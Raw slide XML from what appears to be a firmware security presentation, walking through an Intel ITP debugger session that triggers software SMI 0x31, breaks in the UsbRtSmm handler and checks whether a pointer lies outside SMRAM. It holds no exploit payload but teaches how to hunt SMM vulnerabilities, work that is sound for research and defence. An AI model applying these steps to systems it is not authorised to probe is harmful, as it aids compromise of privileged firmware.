            <a:off x="638100" y="1558125"/>
            <a:ext cx="9682200" cy="453780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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Get the contents of the called subroutine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;? itp.halt()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T1] Halt Command break at 0x33:00007FFA8EBB5F84 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.cv.smmentrybreak=1</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.threads[0].port(0xb2, 0x31) </a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># call SW SMI #0x31</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.go()</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;?</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.threads[0].br(None, ‘0xbd474ca8L’, ‘exe’) </a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># set breakpoint on execution at DispatchFunction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Shape 568"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Shape 569"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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574" name="Shape 574"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Shape 575"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647150" y="1521900"/>
            <a:ext cx="10907700" cy="495600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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.threads[0].go()</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] Debug register break on instruction execution only at 0x38:00000000BD474CA8 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T1] BreakAll break at 0x38:00000000BD7DC838 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T0] BreakAll break at 0x38:00000000BD7DC834 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T1] BreakAll break at 0x38:00000000BD7DC834 in task 0x0040</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;?</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.threads[0].asm(‘$’, 5)</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># show disassembly listing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0x38:00000000BD474CA8 48895c2408		mov qword ptr [rsp + 0x08], rbx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0x38:00000000BD474CAD 57			push rdi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0x38:00000000BD474CAE 4883ec20		sub rsp, 0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0x38:00000000BD474CB2 488b1d574883ec	mov rbx, qword ptr [rip - 0x137cb7a9]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0x38:00000000BD474CB9 488bbbb8760000	mov rdi, qword ptr [rbx + 0x000076b8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.threads[0].step(None, 4)</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># step 4 times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] Single STEP break at 0x38:00000000BD474CAD in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] Single STEP break at 0x38:00000000BD474CAE in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] Single STEP break at 0x38:00000000BD474CB2 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] Single STEP break at 0x38:00000000BD474CB9 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Shape 576"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Shape 577"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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582" name="Shape 582"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Shape 583"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647150" y="1521900"/>
            <a:ext cx="10907700" cy="495600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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.threads[0].display(‘rbx’) </a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># rbx contains value of ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>’</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>rbx = 0x00000000bcee9000</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>rbx.ebx = 0xbcee9000</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>rbx.ebx.bx = 0x9000</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>rbx.ebx.bx.bl = 0x00</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>rbx.ebx.bx.bh = 0x90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F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9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>But is 0xbcee9000 the memory of the SMM?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SMRAM covers the range from 0xbd000000 to 0xbd7fffff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F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9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F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9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F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9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
